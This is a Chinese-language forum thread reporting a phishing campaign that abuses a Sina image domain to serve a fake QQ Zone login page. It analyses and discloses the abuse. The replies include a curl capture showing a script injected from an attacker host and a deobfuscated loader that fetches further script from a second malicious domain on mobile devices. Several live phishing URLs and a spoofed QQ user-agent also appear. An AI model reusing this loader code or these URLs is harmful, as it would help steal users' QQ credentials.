新浪,你家“乐居云盘 API”域名快成钓鱼网页的温床了

2018-11-01 11:59:30 +08:00
 shansing

在 QQ 群里收到一张图片,内含一个二维码,解析成文本如下:

http://photo.house.sina.com.cn/imp/imp/deal/df/10/f/19b39beda77577875e9300c2784_p36_mk35.gif&?_wv=9191&wwv=132

在 QQ 里扫描二维码打开(或者在电脑上伪装 QQ UA,不伪装看不到钓鱼页面),是一个 QQ 空间登录页面。

看起来像是有什么漏洞,竟然把 .gif 解析为网页了。网页加载了脚本 http://yyllssb.iicp.net/x.js

我用的 iOS,在 QQ 中打开后右上角甚至没有“...”选项让我在系统浏览器中打开。加上 sina.com.cn 这个“安全”域名的加成,可以说是伪装性危害性很强了。

赶快修一下吧。

4073 次点击
所在节点    全球工单系统
8 条回复
cxh116
2018-11-01 12:25:56 +08:00
估计是代码逻辑的 bug ,只验证了后缀,没有验证 content-type ,然后上传时客户端把 content-type 设置成 text/html ,然后查看时,把保存 content-type 原路返回导致的.

curl 结果

```
curl -v 'http://photo.house.sina.com.cn/imp/imp/deal/df/10/f/19b39beda77577875e9300c2784_p36_mk35.gif&?_wv=9191&wwv=132'
* Trying 123.59.190.209...
* TCP_NODELAY set
* Connected to photo.house.sina.com.cn (123.59.190.209) port 80 (#0)
> GET /imp/imp/deal/df/10/f/19b39beda77577875e9300c2784_p36_mk35.gif&?_wv=9191&wwv=132 HTTP/1.1
> Host: photo.house.sina.com.cn
> User-Agent: curl/7.61.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx
< Date: Thu, 01 Nov 2018 04:23:46 GMT
< Content-Type: text/html; charset=us-ascii
< Content-Length: 54
< Connection: keep-alive
< LEJU_FQDN: d12070561.grid.house.sina.com.cn
< Accept-Ranges: bytes
< X-Varnish: 47468363
< Age: 0
< Via: 1.1 varnish
< x-hits: 0
< X-Cache: MISS from d15070013.grid.house.sina.com.cn
<
<script src="http://yyllssb.iicp.net/x.js"></script>
* Connection #0 to host photo.house.sina.com.cn left intact
```
newmind
2018-11-01 14:01:36 +08:00
尝试打开, 确实是腾讯家网站啊, 你是怎么操作的
shequ
2018-11-01 14:02:39 +08:00
微云都被关了,还说什么
shansing
2018-11-01 15:14:48 +08:00
@newmind 用 QQ 的 UserAgent 去打开,如:
`Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117`
nullzz
2018-11-01 18:24:32 +08:00
解个密

```

function t(e) {
var t = document.createElement("script");
var n = document.getElementsByTagName("script")[0];
t.src = e,
t.async = !0,
n.parentNode.insertBefore(t, n)
}
function n() {
var e = {
win: false,
mac: false,
xll: false
};
var t = navigator.platform;
e.win = t.indexOf("Win") == 0;
e.mac = t.indexOf("Mac") == 0;
e.x11 = t == "X11" || t.indexOf("Linux") == 0;
if (e.win || e.mac) {
return false;
} else {
return true;
}
}
n() ? t("//starrysd.cn./zepto.js") :window.location.href = "https://act.qzone.qq.com/vip/2018/vip-10th-m?_wv=16778243";

```
shansing
2018-11-03 18:10:16 +08:00
当时的二维码图片这今天的这个相似:
a54425415
2018-11-12 21:29:48 +08:00
http://photo.house.sina.com.cn/imp/imp/deal/58/e3/f/d191f87a335d43d8174234302c4_p36_mk35.gif
aino
2018-11-13 09:29:02 +08:00
刚刚看见一个小老弟中毒了,然后转发给我了,我当然不会受骗,然后就来找这个神奇的东西了
http://photo.house.sina.com.cn/imp/imp/deal/21/9b/5/762cd1be8f22f55ef963cb980dd_p36_mk35.gif

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/503352

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX